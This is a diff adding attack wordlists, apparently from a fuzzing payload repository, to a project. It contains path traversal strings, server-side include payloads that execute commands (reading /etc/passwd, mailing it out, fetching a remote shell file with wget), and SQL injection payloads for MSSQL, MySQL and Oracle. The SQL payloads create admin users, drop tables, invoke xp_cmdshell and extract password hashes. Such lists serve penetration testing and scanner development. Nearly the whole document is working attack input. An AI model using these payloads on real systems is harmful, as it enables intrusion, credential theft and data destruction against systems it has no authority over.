/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/..//{FILE}
|
||||
/..//..//{FILE}
|
||||
/..//..//..//{FILE}
|
||||
/..//..//..//..//{FILE}
|
||||
/..//..//..//..//..//{FILE}
|
||||
/..//..//..//..//..//..//{FILE}
|
||||
/..//..//..//..//..//..//..//{FILE}
|
||||
/..//..//..//..//..//..//..//..//{FILE}
|
||||
/..///{FILE}
|
||||
/..///..///{FILE}
|
||||
/..///..///..///{FILE}
|
||||
/..///..///..///..///{FILE}
|
||||
/..///..///..///..///..///{FILE}
|
||||
/..///..///..///..///..///..///{FILE}
|
||||
/..///..///..///..///..///..///..///{FILE}
|
||||
/..///..///..///..///..///..///..///..///{FILE}
|
||||
/..\\{FILE}
|
||||
/..\\..\\{FILE}
|
||||
/..\\..\\..\\{FILE}
|
||||
/..\\..\\..\\..\\{FILE}
|
||||
/..\\..\\..\\..\\..\\{FILE}
|
||||
/..\\..\\..\\..\\..\\..\\{FILE}
|
||||
/..\\..\\..\\..\\..\\..\\..\\{FILE}
|
||||
/..\\..\\..\\..\\..\\..\\..\\..\\{FILE}
|
||||
/..\\\{FILE}
|
||||
/..\\\..\\\{FILE}
|
||||
/..\\\..\\\..\\\{FILE}
|
||||
/..\\\..\\\..\\\..\\\{FILE}
|
||||
/..\\\..\\\..\\\..\\\..\\\{FILE}
|
||||
/..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
|
||||
/..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
|
||||
/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
|
||||
/./\/./{FILE}
|
||||
/./\/././\/./{FILE}
|
||||
/./\/././\/././\/./{FILE}
|
||||
/./\/././\/././\/././\/./{FILE}
|
||||
/./\/././\/././\/././\/././\/./{FILE}
|
||||
/./\/././\/././\/././\/././\/././\/./{FILE}
|
||||
/./\/././\/././\/././\/././\/././\/././\/./{FILE}
|
||||
/./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}
|
||||
/.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
|
||||
/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}
|
||||
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}
|
||||
/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}
|
||||
/./../{FILE}
|
||||
/./.././../{FILE}
|
||||
/./.././.././../{FILE}
|
||||
/./.././.././.././../{FILE}
|
||||
/./.././.././.././.././../{FILE}
|
||||
/./.././.././.././.././.././../{FILE}
|
||||
/./.././.././.././.././.././.././../{FILE}
|
||||
/./.././.././.././.././.././.././.././../{FILE}
|
||||
/.\..\{FILE}
|
||||
/.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
|
||||
/.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}
|
||||
/.//..//{FILE}
|
||||
/.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
|
||||
/.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}
|
||||
/.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}
|
||||
/../{FILE}
|
||||
/../..//{FILE}
|
||||
/../..//../{FILE}
|
||||
/../..//../..//{FILE}
|
||||
/../..//../..//../{FILE}
|
||||
/../..//../..//../..//{FILE}
|
||||
/../..//../..//../..//../{FILE}
|
||||
/../..//../..//../..//../..//{FILE}
|
||||
/..\{FILE}
|
||||
/..\..\\{FILE}
|
||||
/..\..\\..\{FILE}
|
||||
/..\..\\..\..\\{FILE}
|
||||
/..\..\\..\..\\..\{FILE}
|
||||
/..\..\\..\..\\..\..\\{FILE}
|
||||
/..\..\\..\..\\..\..\\..\{FILE}
|
||||
/..\..\\..\..\\..\..\\..\..\\{FILE}
|
||||
/..///{FILE}
|
||||
/../..///{FILE}
|
||||
/../..//..///{FILE}
|
||||
/../..//../..///{FILE}
|
||||
/../..//../..//..///{FILE}
|
||||
/../..//../..//../..///{FILE}
|
||||
/../..//../..//../..//..///{FILE}
|
||||
/../..//../..//../..//../..///{FILE}
|
||||
/..\\\{FILE}
|
||||
/..\..\\\{FILE}
|
||||
/..\..\\..\\\{FILE}
|
||||
/..\..\\..\..\\\{FILE}
|
||||
/..\..\\..\..\\..\\\{FILE}
|
||||
/..\..\\..\..\\..\..\\\{FILE}
|
||||
/..\..\\..\..\\..\..\\..\\\{FILE}
|
||||
/..\..\\..\..\\..\..\\..\..\\\{FILE}
|
||||
/\..%2f
|
||||
/\..%2f\..%2f
|
||||
/\..%2f\..%2f\..%2f
|
||||
/\..%2f\..%2f\..%2f\..%2f
|
||||
/\..%2f\..%2f\..%2f\..%2f\..%2f
|
||||
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
|
||||
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f
|
||||
/\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f\..%2f{FILE}
|
2241
attack/rfi/rfi.txt
Normal file
2241
attack/rfi/rfi.txt
Normal file
File diff suppressed because it is too large
Load diff
78
attack/server-side-include/server-side-includes-generic.txt
Normal file
78
attack/server-side-include/server-side-includes-generic.txt
Normal file
|
@ -0,0 +1,78 @@
|
|||
<!--#config errmsg="File not found, informs users and password"-->
|
||||
<!--#config timefmt="A %B %d %Y %r"-->
|
||||
<!--#echo var="auth_type" -->
|
||||
<!--#echo var="content_length" -->
|
||||
<!--#echo var="content_type" -->
|
||||
<!--#echo var="date_gmt" -->
|
||||
<!--#echo var="date_local" -->
|
||||
<!--#echo var="DATE_LOCAL" -->
|
||||
<!--#echo var="document_name" -->
|
||||
<!--#echo var="DOCUMENT_NAME" -->
|
||||
<!--#echo var="document_root" -->
|
||||
<!--#echo var="document_uri" -->
|
||||
<!--#echo var="DOCUMENT_URI" -->
|
||||
<!--#echo var="forwarded" -->
|
||||
<!--#echo var="from" -->
|
||||
<!--#echo var="gateway_interface" -->
|
||||
<!--#echo var="http_accept" -->
|
||||
<!--#echo var="http_accept_charset" -->
|
||||
<!--#echo var="http_accept_encoding" -->
|
||||
<!--#echo var="http_accept_language" -->
|
||||
<!--#echo var="http_client_ip" -->
|
||||
<!--#echo var="http_connection" -->
|
||||
<!--#echo var="http_cookie" -->
|
||||
<!--#echo var="http_form" -->
|
||||
<!--#echo var="http_host" -->
|
||||
<!--#echo var="http_referer" -->
|
||||
<!--#echo var="http_ua_cpu" -->
|
||||
<!--#echo var="http_ua_os" -->
|
||||
<!--#echo var="http_user_agent" -->
|
||||
<!--#echo var="last_modified" -->
|
||||
<!--#echo var="netsite_root" -->
|
||||
<!--#echo var="page_count" -->
|
||||
<!--#echo var="path" -->
|
||||
<!--#echo var="path_info" -->
|
||||
<!--#echo var="path_info_translated" -->
|
||||
<!--#echo var="path_translated" -->
|
||||
<!--#echo var="query_string" -->
|
||||
<!--#echo var="query_string_unescaped" -->
|
||||
<!--#echo var="remote_addr" -->
|
||||
<!--#echo var="remote_host" -->
|
||||
<!--#echo var="remote_ident" -->
|
||||
<!--#echo var="remote_port" -->
|
||||
<!--#echo var="remote_user" -->
|
||||
<!--#echo var="request_method" -->
|
||||
<!--#echo var="request_uri" -->
|
||||
<!--#echo var="script_filename" -->
|
||||
<!--#echo var="script_name" -->
|
||||
<!--#echo var="script_uri" -->
|
||||
<!--#echo var="script_url" -->
|
||||
<!--#echo var="server_addr" -->
|
||||
<!--#echo var="server_admin" -->
|
||||
<!--#echo var="server_name -->
|
||||
<!--#echo var="server_port" -->
|
||||
<!--#echo var="server_protocol" -->
|
||||
<!--#echo var="server_software" -->
|
||||
<!--#echo var="site_htmlroot" -->
|
||||
<!--#echo var="total_hits" -->
|
||||
<!--#echo var="tz" -->
|
||||
<!--#echo var="unique_id" -->
|
||||
<!--#echo var="user_name" -->
|
||||
<!--#exec cmd="/bin/ls /" -->
|
||||
<!--#exec cmd="/bin/ls /" --><br/>
|
||||
<!--#exec cmd="cat /etc/passwd" --><br/>
|
||||
<!--#exec cmd="cd C:\WINDOWS\System32">
|
||||
<!--#exec cmd="dir" -->
|
||||
<!--#exec cmd="find / -name *.* -print" --><br/>
|
||||
<!--#exec cmd="ls" -->
|
||||
<!--#exec cmd="mail email@dom.tld <mailto:email@dom.tld> < cat /etc/passwd" --><br/>
|
||||
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
|
||||
<!--#exec cmd="whoami"-->
|
||||
<!--#flastmod virtual="echo.html" -->
|
||||
<!--#fsize file="ssi.shtml" -->
|
||||
<!--#include file=?UUUUUUUU...UU?-->
|
||||
<!--#printenv -->
|
||||
<pre><!--#echo var="DATE_LOCAL" --> </pre>
|
||||
<pre><!--#exec cmd="dir" --></pre>
|
||||
<pre><!--#exec cmd="ls" --></pre>
|
||||
<pre><!--#exec cmd="whoami"--></pre>
|
41
attack/sql-injection/detect/GenericBlind.txt
Normal file
41
attack/sql-injection/detect/GenericBlind.txt
Normal file
|
@ -0,0 +1,41 @@
|
|||
sleep(__TIME__)#
|
||||
1 or sleep(__TIME__)#
|
||||
" or sleep(__TIME__)#
|
||||
' or sleep(__TIME__)#
|
||||
" or sleep(__TIME__)="
|
||||
' or sleep(__TIME__)='
|
||||
1) or sleep(__TIME__)#
|
||||
") or sleep(__TIME__)="
|
||||
') or sleep(__TIME__)='
|
||||
1)) or sleep(__TIME__)#
|
||||
")) or sleep(__TIME__)="
|
||||
')) or sleep(__TIME__)='
|
||||
;waitfor delay '0:0:__TIME__'--
|
||||
);waitfor delay '0:0:__TIME__'--
|
||||
';waitfor delay '0:0:__TIME__'--
|
||||
";waitfor delay '0:0:__TIME__'--
|
||||
');waitfor delay '0:0:__TIME__'--
|
||||
");waitfor delay '0:0:__TIME__'--
|
||||
));waitfor delay '0:0:__TIME__'--
|
||||
'));waitfor delay '0:0:__TIME__'--
|
||||
"));waitfor delay '0:0:__TIME__'--
|
||||
benchmark(10000000,MD5(1))#
|
||||
1 or benchmark(10000000,MD5(1))#
|
||||
" or benchmark(10000000,MD5(1))#
|
||||
' or benchmark(10000000,MD5(1))#
|
||||
1) or benchmark(10000000,MD5(1))#
|
||||
") or benchmark(10000000,MD5(1))#
|
||||
') or benchmark(10000000,MD5(1))#
|
||||
1)) or benchmark(10000000,MD5(1))#
|
||||
")) or benchmark(10000000,MD5(1))#
|
||||
')) or benchmark(10000000,MD5(1))#
|
||||
pg_sleep(__TIME__)--
|
||||
1 or pg_sleep(__TIME__)--
|
||||
" or pg_sleep(__TIME__)--
|
||||
' or pg_sleep(__TIME__)--
|
||||
1) or pg_sleep(__TIME__)--
|
||||
") or pg_sleep(__TIME__)--
|
||||
') or pg_sleep(__TIME__)--
|
||||
1)) or pg_sleep(__TIME__)--
|
||||
")) or pg_sleep(__TIME__)--
|
||||
')) or pg_sleep(__TIME__)--
|
1
attack/sql-injection/detect/Generic_SQLI.txt
Normal file
1
attack/sql-injection/detect/Generic_SQLI.txt
Normal file
|
@ -0,0 +1 @@
|
|||
|
16
attack/sql-injection/detect/MSSQL.txt
Normal file
16
attack/sql-injection/detect/MSSQL.txt
Normal file
|
@ -0,0 +1,16 @@
|
|||
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
|
||||
'create user name identified by 'pass123' --
|
||||
'create user name identified by pass123 temporary tablespace temp default tablespace users;
|
||||
' ; drop table temp --
|
||||
'exec sp_addlogin 'name' , 'password' --
|
||||
' exec sp_addsrvrolemember 'name' , 'sysadmin' --
|
||||
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
|
||||
' grant connect to name; grant resource to name; --
|
||||
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
|
||||
' or 1=1 --
|
||||
' union (select @@version) --
|
||||
' union (select NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
|
8
attack/sql-injection/detect/MSSQL_blind.txt
Normal file
8
attack/sql-injection/detect/MSSQL_blind.txt
Normal file
|
@ -0,0 +1,8 @@
|
|||
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
|
||||
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
|
||||
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
|
||||
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
|
||||
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
|
||||
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --
|
||||
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
|
||||
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
|
9
attack/sql-injection/detect/MySQL.txt
Normal file
9
attack/sql-injection/detect/MySQL.txt
Normal file
|
@ -0,0 +1,9 @@
|
|||
1'1
|
||||
1 exec sp_ (or exec xp_)
|
||||
1 and 1=1
|
||||
1' and 1=(select count(*) from tablenames); --
|
||||
1 or 1=1
|
||||
1' or '1'='1
|
||||
1or1=1
|
||||
1'or'1'='1
|
||||
fake@ema'or'il.nl'='il.nl
|
10
attack/sql-injection/detect/MySQL_MSSQL.txt
Normal file
10
attack/sql-injection/detect/MySQL_MSSQL.txt
Normal file
|
@ -0,0 +1,10 @@
|
|||
1
|
||||
1 and user_name() = 'dbo'
|
||||
\'; desc users; --
|
||||
1\'1
|
||||
1' and non_existant_table = '1
|
||||
' or username is not NULL or username = '
|
||||
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
|
||||
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
|
||||
1 uni/**/on select all from where
|
||||
|
55
attack/sql-injection/detect/oracle.txt
Normal file
55
attack/sql-injection/detect/oracle.txt
Normal file
|
@ -0,0 +1,55 @@
|
|||
’ or ‘1’=’1
|
||||
' or '1'='1
|
||||
'||utl_http.request('httP://192.168.1.1/')||'
|
||||
' || myappadmin.adduser('admin', 'newpass') || '
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
|
||||
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
|
||||
